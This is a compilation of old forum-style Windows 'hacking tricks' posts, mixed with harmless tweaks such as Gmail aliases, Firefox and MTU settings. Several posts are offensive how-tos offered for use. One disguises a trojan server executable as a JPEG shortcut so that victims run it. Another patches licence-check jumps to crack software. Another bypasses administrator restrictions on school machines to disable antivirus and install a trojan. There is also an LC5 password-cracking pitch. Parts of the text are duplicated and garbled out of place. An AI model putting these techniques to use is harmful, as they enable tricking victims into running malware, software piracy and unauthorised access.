MailTracking.com - What is it and how does it work? What is MailTracking? MailTracking is the most powerful and reliable email tracking service that exists today. In short - MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more
How do I send a tracked email? There are two ways you can send tracked emails:
Simply add: .mailtracking.com to the end of your recipients email address (they won't see this)
or
Install our ActiveTracker plugin to add the tracking for you.
Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don't usually write to themselves) - so we recommend you test by sending to other people. What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:
Date and time opened
Location of recipient (per their ISP city /town)
Map of location (available on paid subscriptions)
Recipients IP address
Apparent email address of opening (if available)
Referrer details (ie; if accessed via web mail etc)
URL clicks
How long the email was read for
How many times your email was opened
If your email was forwarded, or opened on a different computer
All messages sent via MailTracking benefit from our SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: MailTracking.com does not use or contain any spy-ware, mal-ware, nor virues, it is not illegal to use, and does not breach any privacy regulations in any countries. What else does MailTracking do? There are lots of great features available to you - these include the following sending options:
Certified email
Ensured-Receipts and retractable emails
Invisible tracking
Self-Destructing emails
Block printing
Block forwarding
Adobe Acrobat PDF Document Tracking
Secure Encypted emails
Track MS Word or Excel documents
For more details regarding sending options, please see our: FAQ's
You can also choose how to receive your receipts:
In your Personal Tracking Page (when you log in)
Email ReadNotifications
Legal Proof-of-Opening receipts
Delivery Service Notifications (DSN's)
SMS alert on your cell-phone or pager
Instant Messenger
These options are available to you from "My Account" in Member Utilities. Getting started MailTracking offers a lot of features and sending options, but it is very easy to use our service. On start up, your account is already configured per our 'Recommended' tracking defaults - and we will automatically send you email ReadNotifications when your tracked emails are opened. If you'd like to take us for a 'test drive', please sign up for no-obligation free trial from the MailTracking.com Homepage

prevent spam in your Gmail account
prevent spam in your Gmail account
a simple trick i accidentally came through would like to share
Are you worried about spam in your precious gmail account ?
If yes, then you would like to consider making aliases of your gmail id to use when you're not sure whether you're signing up for something safe or not.
It is a very simple task to provide an alias of your gmail id. Whenever you sign up on the internet on some site that you think may not be safe(or a site which might send you spam),all you have to do is give out the email address as username+insertanythingyouwanthere@gmail.com
For example if your email id is james@gmail.com,you can provide james+21@gmail.com or james+test@gmail.com .You can put anything after the + and all email sent will still go to your gmail account.
In the event that you did give your email to a spammer and you start receiving spam, don't worry! Just create a filter, and make everything that is sent to username+whateveryouputhere@gmail.com go to the trash. This way all the spam that you might get will automatically be deleted.

GIFT 4 XP USERS
Well these are a few new tricks, which I dont think have appeared on this community before. This too have been lifted from a book. Coz I dont like to take credit of anything after a copy-paste of something which
I donno. Courtesy : DIGIT Magazine. [Highly recommended to those who want to 'learn hacking' and those who ask for 'E-Books', although it doesn't speak much abt hacking (altho it gives you idea of how
viruses, keyloggers, sniffers, SQL injections, backdoors etc work and wich are the top 5 sniffers, viruses you have to save your PC from) but it is good source of knowledge for a Computer Enthusiast like me.
(1) How to test whether your XP is orignal or not.
This helps you to prevent the Computer Vendor fooling you and taking a 250 bucks etc claiming that he has installed orignal Windows XP on your PC. Check out this test.
Open your Run [Start > Run or Win key + 'R']
Type 'oobe/msoobe /a' and hit enter.
If activated, it will give you the message that 'Windows Already Activated...Click OK To Exit' else it will ask you the license code to activate the Windows OS.
(2) This one I found very helpful and intresting. specially if it a multi-user or shared computer. You can specify the login time of a user. This helps the Administrator [or parent] to ensure that their user [child] is
not spending too much time on the PC. It even shows the last login date and time by the user so as to monitor his usage.
Go to Command Prompt [Start >Run>cmd or Start>programs>Accesories>Command Prompt].
Type 'net user '
Add the parameter '/times :' followed by the days you want to allow [Mon-Sun] and then comma (,) and the time [in 24 Hr format]
Eg : net user Banner/times :Sun,15-19
Means I can sign in only on Sundays between 3 pm and 7pm
Pls note the at 7pm windows WILL NOT SIGN ME OFF.
It simply means it restricts my LOGIN after 7pm.
This is sensible only if other accounts are password protected.
Check this by typing ' net user ' at the command prompt.
------- >> ( If this does not work pls try without leaving a space between '/times' and ':' <<------------------
(3) Well all of us know how to change the sound to b played wen an application starts [Eg: Start Windows, Turn Off, Error etc], but those are the default applications. So lets try to add something to the existing
set of application [like mayb Notepad, MS Word, etc].
Go to your registry [Run >> 'regedit' or browse through C:/Windows/Regedit]
Browse through HKEY_CURRENT_USER\AppEvents\Schemes\Apps
Right Click on Apps
New > Key
Type the name in windows format [Eg: mspaint for Paint Brush, msword for Word etc]
Now click on the newly created option
Right click on Default > Modify > Edit String > Value Line type the name you wish to see on the Sounds Settings Box.
Go to control panel > sound & audio devices > sounds > and scroll down to see the newly created program [on the last line mostly]
Click browse and select your favourite song in .wav format .....
I hope this helps you. Thats all I hav in stock for the time being. Pls do contribute in if you have something intresting to share.
Check out this test.

cracks windows password
There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP. I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way. How it works: Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen. Good intentions:
can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to accesscomputers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.
Bad intentions:
Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domaincontroller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied by http://rahulhackingarticles.wetpaint.com

Converting .exe files to .jpg
Converting .exe files to .jpg
1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter

track IP address
Getting Ip's:--
To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to
In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--
Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type http://www.yahoo.com/ as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows
See http://blacksun.box.sk/tutorials/format.ph...le=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
Save it as something.reg then run it. Simple.
ip adress detail::::::::;
IP ADDRESS DETAILS
In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.
Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .
In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.
What is IP and how to get the IP of a remote system::
Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.
Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses
Address Class Dotted Decimal Notation Ranges
Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx
The various classes will be clearer after reading the next few lines.
Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".
A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as
"24's" and is commonly used by most ISP's.
Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.
Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:
xxx.xxx.zzz.yyy
where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e.
yyy is variable.
***********************
For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?
So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.
This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.
In my country, say there are three main ISP’s:
ISP Name Network Address Allotted
ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx
Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method
of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.
Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.
Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.
Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :
Proto Local Address Foreign Address State
TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED
Now you got the IP address of hotmail ass 64.4.xx.xx .
Similarly you can figure out the IP address of most http or ftp connections.
To know your own IP type the following command in a dos windows
C:\netstat –n
[this commands converts the IP name into IP addresses]
this is what you will probably see on typing the above command
Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
Here 203.xx.251.161 is your IP address.
Now lets clarify the format used by netstat :
Proto : It shows the type of protocol the connection with the remote system is using.
Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.
Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.
xxx.yyy.zzz.aaa:1024
in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system
Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like
C:\netstat
Proto Local Address Foreign Address State
TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED
Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.
Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.
Below I have produced a list of ports and popular services generally found to be running.
21 :: FTP port
80 :: http port
23 :: Telnet port
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
Save it as something.reg then run it. Simple.
ip adress detail::::::::;
It is referred to as "16's".

make firefox run faster
1. first in the URL bar, Type “about:config”. This will bring up a list of commands and variables you can edit.
2. The second step is to put “network.http.pipelining” in the filter and change the value to “true”.
3. After that you will want to put “network.http.proxy.pipelining” in the filter.
Like the last one, make that value set to “true” also.
4. Next, locate “network.http.pipelining.maxrequests” and change the value to some number higher, say 10,20 or even 30, it would make up to 10,20 or 30 requests at once.
5. The last step is to right click anywhere and select “New” then “Integer”. Name it “nglayout.initialpaint.delay” and make its value “0″. This will make the browser respond faster on the information of the websites it receives.
6. Close out FireFox (make sure FireFox is closed by viewing the Task Manager) and restart it and enjoy the new mega speed

First open dos command,go to >>(Start/Run/type "command" without inverted commas and hit enter),& in the MSDOS prompt, type:
netstat -a
(make sure you include the space in between the "t" and the "-a").
This command will show u the host name of the lamer and ofcorse urz also ..ur host name will be under local address and his wud be under foreign address.. note any suspicious name and every numbr u c aftr the host name under foreign address which is new and suspicious there(numbers are ports but i consider u totally unaware).
After ur done,now type
Netstat -an (again a space between "t" and "-an")
this will list all connections in numerical form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.
It wud look a bit like this
Proto.....Local Address.....Foreign Address.....State
TCP.......0.0.0.0:135.......0.0.0.0:0...........Listening
TCP.......127.0.0.1:1026....0.0.0.0:0...........Listening
TCP.......Your IP:Port......0.0.0.0:0...........Listening
TCP.......Your IP:Port......A New IP:Port.......Established
A New IP:Port <
Now that u have a IP Addess and a host name, type
tracert type IP address/Hostname here
write whole thing there.. thats after u write tracert give a space then type A New IP we found in last step.. give a / then write..Host name we found in first step.remember no port there to be added..
This will trace the lamer which is prolly using a trojan on ur computer to do what he wants..result will give u some ip addresses ..note all of them
now go to ip2location.com/free.asp
write ip addresses in the box and see where the ips belong to..some ips will give u ISPs like mtnl ... last ip wud be his ip ..now call ur or his ISP & inform dem abt it!DO RESPOND 2 DIS..

How to crack a software
How to crack a software
tools required
1.hiew
2.win32dasm89++
you may download these tools from
http://www.esnips.com/web/hackingstuffs?docsPage=2#files
i am not a master in this field but what i know i can share it with you.
now we have to crack soft. we have to make a backup of the exe file of this software.
as we are using dissembler it will dissemble the soft into its assembly codes so u need to know some basic codes which we need in this job
----------------------------------------------------------
this part is copied from anither community post as i dont feel to rewrite the same thing again
EB-----------------jmp---------------------------Unconditional jump
90-----------------nop---------------------------No operation
75/0F85------------jne---------------------------jump if not equal
74/0F84------------je----------------------------jump if equal
77/0F87------------ja----------------------------jump if above
0F86---------------jna---------------------------jump if not above
0F83---------------jae------------------------jump if above or eq
-------------------------------------------------------------------
now start
1st step-
try to register the software with some random character. you will get an error messege like "wrong code"
note down this code
dessemble the exe file using win32dasm
u will getthe codes in too many lines .. may be 10000 depending upon the size of soft.
now find "wrong code" by search option in the dissembler
as you can see the codes are written in modules
just the line you find the "wrong code" ..try to check for the start of that module
hint* check for the lines "unconditional and conditional jump statements"
see the memory addresses written there
eg- oo1a009877...
leave this thing here only
now open the same .exe file with the help of hiew
open hiew.exe and start working on it with keyboard only
select the folder and select the file to open it
after opening it u can see garbage characters that you can not understand.
press f4 and select 3rd option ie- decode
now you can see the codes
now note the addresses written on dissembler part where we left
on hiew window press f5 and press "." then foloowed by the address u noted there
now after coming to the desired position select edit option by pressing f3
now we have to revert the statements
like lets say we encountered jne
like jne to je and vice-versa by changing there corresponding values ie 84<-->85
like this revert all the loop statements noted on dissembler module where we left after searching
now after editing the values press enter key and then press "f9" to update the changes in the exe file
now exit hiew
done!!!
now replace the .exe file with the one you just cracked
now it will accpet all the wrong codes which u will ener for registration and on entering the correct key only it will show error messege
simple!!!!

Tuning up MTU (Maximum Transmission Unit) to speed up Internet access
Now let me tell you one important fact related with tuning. Value of MTU depends upon how fast a connection you have, what kind of activities you perform (ask yourself a question. Are your a mild, average or high end user of Internet ? To put it in other words, Do you download little or nothing, or are an average surfer or are Internet savvy individual and download everything from programs, apps, patches to watching Internet audio/video real-time content?) Depending upon who you are as a user and what kind of connection (modem, dsl, cable or in rare cases T1/T3), this tuning may have little to significant effect on your Internet experience. All right MTU stand for Maximum Transmission Unit.
Value of MTU decides the size of Internet data packet. Bigger the size, more you can transfer.
Analogy could be made with a bucket. If bucket is small, you can carry little but it would be no strain on your strength. Bigger the bucket, more you can carry but it strains your physical strength. (Well! Its not that simple but good enough to understand). Objective should be find a perfect balance which works for you. I think maximum that you can put is as value of MTU is 1500 (but could be higher for your specific network) and it may not make sense making it smaller than 68.Again this is a registry tweak unless and until you have a tweaking utility that can do it for you.Open Registry by going to START-RUN and entering REGEDIT and Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters\Interfaces\ ID for Adapter. For this right click on right pane and add a key by the name MTU. For this key you can add a DWORD value from 68 to 1500 (or higher value is certain cases). If you put less than 68, it will default to 68.
If you put a value higher than 1500 or your Network permitted max, it will default to permitted max.

As started on previous tip (Tip 52), MTP size plays an important role in deciding Internet speed. But its not so easy to determine the right value of MTU. For those of us who fall in this category and would prefer computer to find that for us, follow trick may work. I can not say with confidence whether this would work across all network but it should and there is no harm in trying it out. Now before I do that let me tell you what this action will do.
Applying this trick, you would ask computer to automatically find out the maximum MTU size possible in the connection path to a host. This value could be different for different sites. I think this trick should pick the lowest common denominator across a particular path. Typically If MTU size is not optimized, this job has to be done by a router which would mean a significant waste of time (small chunks adds to a considerable loss if you imagine that there are billions of packets involved across the whole Internet) resulting in poor throughout and congestion on cyber lanes. All right this key is called Enable PMTU Discovery.
Again this is a registry.Open Registry by going to START-RUN and entering REGEDIT and Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters\Interfaces\ ID for Adapter. For this right click on right pane and add a key by the name EnablePMTUDiscovery. For this key you can add a DWORD boolean value of 0 or 1 with 1 being TRUE (value that enables auto detection).
Since we are trying this tweak, set to 1 and enable the TCP to attempt to discover the MTU size over the specific path to host.

Breaking the restrictions of a administrator
This works on WIn 2000 & WIN XP.
Dis can be used to gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit' by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.
Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no
network access. But that's cool because now we can access 'Internet options',
click in the 'connections' tab click the LAN settings, click the proxy
settings, and in the little white box at the bottom we can specify websites
that bypass the proxy server (eg www.yahoo.com) Now once you have changed
the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the
internet settings you specified.
Its only an 'Unplugging technique' to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u're will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type "cacls" in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type "cacls /?" for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).

it is possible to access only shared folders. There is another type called admin share .. which allows to access computer by its administrator account..
Dos Command "net accounts" can be used to display the user accounts database and modify password and logon requirements for all accounts.
Syntax: net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain].
Examples: 1) To display the current settings, the password requirements, and the server role for a server, type: net accounts. 2) to force users to log off after the logon time expires with a five-minute warning, type: net accounts /forcelogoff:5.

to send a file to remote computer
. Open HyperTerminal.
2. Open a saved connection file or create a new connection.
3. Connect to the remote computer.
4. On the Transfer menu, click Send File.
5. In the Filename box, type the path and name of the file you want to send.
6. In the Protocol list, click the protocol your computer is using to send the file.
7. Click Send.
And make sure:
Both the sending computer and the receiving computer must be using the same file transfer protocol.
In most cases, you need to configure the file-transfer software on the remote computer so that it receives the file correctly. For more information, contact the administrator of the remote computer.
If you use the Zmodem protocol to transfer data, the remote computer will receive the file automatically and will not need to perform a manual receive procedure.
Be aware that the automatic download feature of the Zmodem protocol can pose a security risk by allowing remote users to send files to your computer without your explicit permission. To avoid this risk, you must select a protocol other than Zmodem or clear the Allow remote host initiated file transfers check box on the Settings tab of Connection Properties.
